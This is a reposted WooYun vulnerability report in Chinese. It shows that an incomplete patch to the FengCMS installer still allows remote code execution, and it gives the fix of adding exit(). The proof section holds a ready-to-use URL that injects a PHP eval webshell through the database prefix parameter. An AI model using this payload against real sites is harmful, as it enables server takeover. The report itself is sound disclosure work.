WooYun-2014-76648:FengCMS 修复不当导致getshell

  • A+
所属分类:乌云案例 渗透实战
摘要

漏洞作者: xiaoL来源:http://www.wooyun.org/bugs/wooyun-2014-076648


WooYun-2014-76648:FengCMS 修复不当导致getshell

漏洞作者: xiaoL

来源:http://www.wooyun.org/bugs/wooyun-2014-076648

简要描述

FengCMS 修复不当导致getshell,属于修复不当,跟其他的没重复了- -,对审核同学造成的不便深感歉意。

详细说明

之前提交过一次跟http://**.**.**.**/bugs/wooyun-2014-067508

漏洞重复了。现在重新看一下。发现修复的有问题,而且install目录默认是不会自动删除的,依然可以getshell!

header("Content-type:text/html;charset=utf-8");

define("TPL_INCLUDE",1);

// 定义当前路径

define('ABS_PATH',dirname(__FILE__));

define('ROOT_PATH',dirname(ABS_PATH));

if(!$_GET['step'])$_GET['step']=1;

$config_file=ROOT_PATH.'/config.php';

$install_file=ABS_PATH.'/install.sql';

//这里是修改添加的代码,由于是输出javascript,所以可以无视掉

if(file_exists(ROOT_PATH.'/upload/INSTALL')){

  echo '<script type="text/javascript">alert("系统已安装,如需要重新安装,请手工删除upload目录下的INSTALL文件!");</script>';

  echo '<meta http-equiv="refresh" content="0;url=/">';

}

所以直接进行setp = 4 的步骤,其中只有DB_PREFIX字段不影响,可以用来getshell。

漏洞证明

直接访问URL:

.../install/index.php?host=localhost&user=root&password=root&dbname=hello&prefix=f_');@eval($_POST[101]);('&url_type=1&step=4

WooYun-2014-76648:FengCMS 修复不当导致getshell

WooYun-2014-76648:FengCMS 修复不当导致getshell

WooYun-2014-76648:FengCMS 修复不当导致getshell

修复方案

echo 完了

exit()一下

发表评论

您必须才能发表评论!